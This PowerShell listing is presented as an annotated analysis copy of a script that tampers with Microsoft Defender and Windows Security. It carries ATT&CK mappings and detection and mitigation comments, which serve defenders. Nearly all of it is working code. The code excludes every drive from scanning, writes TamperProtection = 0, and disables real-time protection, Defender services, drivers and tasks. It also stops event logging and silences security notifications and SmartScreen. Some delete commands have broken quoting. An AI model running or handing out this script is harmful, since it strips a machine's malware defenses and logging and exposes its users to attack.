# Analysis copy of a Microsoft Defender / Windows Security tamper script
# (PowerShell; section comments translated from Russian).
# Every step below weakens or silences Defender, SmartScreen, Windows Security
# notifications or event logging. The HKLM, service and scheduled-task changes
# normally require an elevated session.
# ATT&CK mapping: T1562.001 (Impair Defenses: Disable or Modify Tools),
# T1562.002 (Disable Windows Event Logging), T1112 (Modify Registry).
# Detection: alert on writes to the registry paths named below (Sysmon event 13,
# or Security 4657 where a SACL is set) and on Defender Operational events
# 5001/5007. Section 11 stops the EventLog service, so rely on telemetry that is
# shipped off the host rather than on local logs.
# Mitigation: keep Tamper Protection managed centrally and remove local admin
# rights; presumably most Defender changes here are rejected while Tamper
# Protection is on (confirm for the build in use).
# NOTE(review): quoting in sections 9 and 10 is unbalanced as captured, so this
# listing may not parse as one file. Treat it as a list of indicators and confirm
# the real host state instead of assuming each step ran.
# Aliases used: ni = New-Item, gdr = Get-PSDrive, |% = ForEach-Object,
# spsv = Stop-Service, -ea 0 = -ErrorAction SilentlyContinue.

# 1. Create the policy exclusion key and add every filesystem drive root as an
#    excluded path (registry policy value plus Add-MpPreference), output discarded.
#    An exclusion equal to a drive root removes scanning for that whole volume;
#    review ExclusionPath in Get-MpPreference and this policy key during triage.
(ni "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" -force)>$null
((gdr -psp FileSystem).Root |% {New-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" -n $_ -pr string -v "" -force; Add-MpPreference -ExclusionPath $_ -force})>$null

# 2. Turn off Controlled Folder Access (the ransomware write protection).
Set-MpPreference -EnableControlledFolderAccess Disabled

# 3. Write TamperProtection = 0 under the Defender Features key.
#    A write attempt to this value is itself a high-signal indicator.
reg add "HKLM\Software\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d 0 /f

# 4. Set Start = 4 (disabled) for the SgrmBroker and SecurityHealthService
#    service keys; the edit is made in the registry, not through the SCM.
(("SgrmBroker","SecurityHealthService") |% {reg add "HKLM\System\CurrentControlSet\Services\$_" /v "Start" /t REG_DWORD /d 4 /f})>$null

# 5. Suppress Windows Security and system toast notifications (machine and
#    per-user keys), so the user gets no visible warning that protection is off.
reg add "HKLM\Software\Microsoft\Windows Defender Security Center\Notifications" /v "DisableNotifications" /t REG_DWORD /d 1 /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender Security Center\Notifications" /v "DisableEnhancedNotifications" /t REG_DWORD /d 1 /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d 1 /f
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SecurityAndMaintenance" /v "Enabled" /t REG_DWORD /d 0 /f
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SmartAppControl" /v "Enabled" /t REG_DWORD /d 0 /f
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\PushNotifications" /v "ToastEnabled" /t REG_DWORD /d 0 /f
reg add "HKCU\Software\Policies\Microsoft\Windows\CurrentVersion\PushNotifications" /v "NoToastApplicationNotification" /t REG_DWORD /d 1 /f
reg add "HKCU\Software\Policies\Microsoft\Windows\Explorer" /v "DisableNotificationCenter" /t REG_DWORD /d 1 /f
# Same goal, looped: three per-user notification switches set to 0, then six
# Security Center notification values set to 1.
(('EnableNotifications','EnableToastApplicationNotification','NOC_GLOBAL_SETTING_TOASTS_ENABLED') |% {reg add 'HKCU\Software\Microsoft\Windows\CurrentVersion\Notifications\Settings' /v $_ /t REG_DWORD /d 0 /f})>$null
(('DisableMonitoring','DisableNotifications','DisableAlerts','DisableNotificationsUI','DisableEnhancedNotifications','DisableNotificationCenter') |% {reg add 'HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications' /v $_ /t REG_DWORD /d 1 /f})>$null

# 6. Group-policy values that switch off Defender and its components:
#    engine, PUA detection, real-time protection and cloud (SpyNet/MAPS) reporting.
#    NOTE(review): current Windows client builds are reported to ignore
#    DisableAntiSpyware; confirm per build before relying on that.
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "AllowFastServiceStartup" /t REG_DWORD /d 0 /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d 1 /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableSpecialRunningModes" /t REG_DWORD /d 1 /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "ServiceKeepAlive" /t REG_DWORD /d 0 /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d 0 /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d 1 /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d 1 /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d 1 /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRoutinelyTakingAction" /t REG_DWORD /d 1 /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d 1 /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d 1 /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d 0 /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f

# 7. Set Start = 0 on the two Defender WMI Autologger sessions, which removes
#    Defender API/audit trace data that responders would otherwise have.
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d 0 /f
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d 0 /f

# 8. Disable the Defender and ExploitGuard scheduled tasks (scan, cleanup,
#    cache maintenance, verification, MDM policy refresh).
schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable

# 9. Remove the SecurityHealth autostart entries (the Windows Security tray icon).
#    NOTE(review): the value name is not closed with a quote on either line.
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth /f
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth /f

# 10. Remove the EPP shell context-menu handlers (the Defender scan entry for
#     files, directories and drives).
#     NOTE(review): the key path is not closed with a quote on any of these lines.
reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP /f
reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP /f
reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP /f

# 11. Disable the core protection services.
#     First loop: stop and disable EventLog, Wecsvc, mpssvc, wscsvc, wcifs and
#     Sense; -ea 0 hides every failure, so protected services fail silently.
#     Stopping EventLog is the logging-impairment step: a gap in the local event
#     logs is itself an indicator.
(('EventLog','Wecsvc','mpssvc','wscsvc','wcifs','Sense') |% {spsv $_ -force -ea 0; Set-Service $_ -StartupType Disabled -ea 0})>$null
#     Second loop: Start = 4 written straight into the service keys of the
#     Defender drivers and services.
(("WdBoot","MDCoreSvc","WdFilter","WdNisDrv","WdNisSvc","WinDefend") |% {reg add "HKLM\System\CurrentControlSet\Services\$_" /v "Start" /t REG_DWORD /d 4 /f})>$null
#     Third loop: targets the two web threat defense services.
(("webthreatdefsvc","webthreatdefusersvc") |% {sc config $_ start= disabled})>$null

# 12. Turn off SmartScreen (Explorer, Edge, app web-content evaluation) and zero
#     the CI policy state values; VerifiedAndReputablePolicyState presumably
#     controls Smart App Control (confirm against vendor documentation).
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t REG_SZ /d Off /f
reg add "HKCU\Software\Microsoft\Edge\SmartScreenEnabled" /ve /t REG_DWORD /d 0 /f
reg add "HKCU\Software\Microsoft\Edge\SmartScreenPuaEnabled" /ve /t REG_DWORD /d 0 /f
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t "REG_DWORD" /d 0 /f
reg add "HKLM\SYSTEM\CurrentControlSet\Control\CI\Policy" /v "VerifiedAndReputablePolicyState" /t REG_DWORD /d 0 /f
(('SvcEnabled','ServiceStart','ServiceState') |% {reg add 'HKLM\SYSTEM\CurrentControlSet\Control\CI' /v $_ /t REG_DWORD /d 0 /f})>$null

# Keeps the console open until the operator responds.
pause